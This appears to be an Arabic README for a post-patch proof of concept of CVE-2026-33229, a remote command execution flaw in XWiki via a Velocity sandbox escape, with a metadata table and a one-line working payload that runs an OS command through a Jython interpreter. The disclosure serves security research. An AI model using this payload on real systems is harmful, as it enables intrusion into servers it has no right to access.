
إثبات مفهوم لاستغلال CVE-2026-33229، وهو ثغرة تنفيذ أوامر عن بُعد (RCE) في XWiki عبر تجاوز الحماية (sandbox) في Apache Velocity، مع تفاصيل تقنية وحمولة (payload) فعّالة.
ثغرة تنفيذ أوامر عن بُعد في منصة XWiki تسمح لمستخدم مُصادق يمتلك صلاحيات البرمجة النصية بتجاوز حماية Apache Velocity sandbox بالكامل — دون الحاجة إلى Java Reflection — من خلال التنقل عبر الكائنات المُهيأة مسبقًا الموجودة بالفعل في سياق Velocity.
📄 التفاصيل التقنية الكاملة: youssefazefzaf.com/posts/cve
| الحقل | القيمة |
|---|
| معرّف CVE | CVE-2026-33229 |
| المنتج المتأثر | منصة XWiki |
| المكوّن | مُحرك عرض Velocity macros، معامل عنوان الصفحة |
| الصلاحيات المطلوبة | مُصادق + صلاحية Script |
| التأثير | تنفيذ أوامر عن بُعد |
| GHSA | GHSA-h259-74h5-4rh9 |
| تاريخ الاكتشاف | 7 نوفمبر 2025 |
| تاريخ التصحيح | 10 ديسمبر 2025 |
| تاريخ الإفصاح | 8 أبريل 2026 |
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')")
إشعار الإفصاح المسؤول: تم نشر إثبات المفهوم بعد توفر التصحيح. لا تستخدمه ضد أنظمة لا تملكها.